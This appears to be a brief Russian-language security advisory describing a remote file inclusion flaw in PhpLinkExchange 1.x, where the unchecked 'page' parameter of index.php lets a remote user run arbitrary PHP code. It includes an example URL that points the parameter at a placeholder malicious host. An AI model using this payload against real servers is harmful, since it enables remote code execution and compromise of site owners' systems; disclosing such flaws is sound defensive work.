Программа: PhpLinkExchange 1.x

Удаленный пользователь может выполнить
произвольный PHP-код на сервере. Ситуация
возможно из-за того, что данные, переданные
скрипту "index.php" в параметре page не
проверяются.

Пример:

http://[victim]/index.php?page=http://[malicious_site]/file



Оставить мнение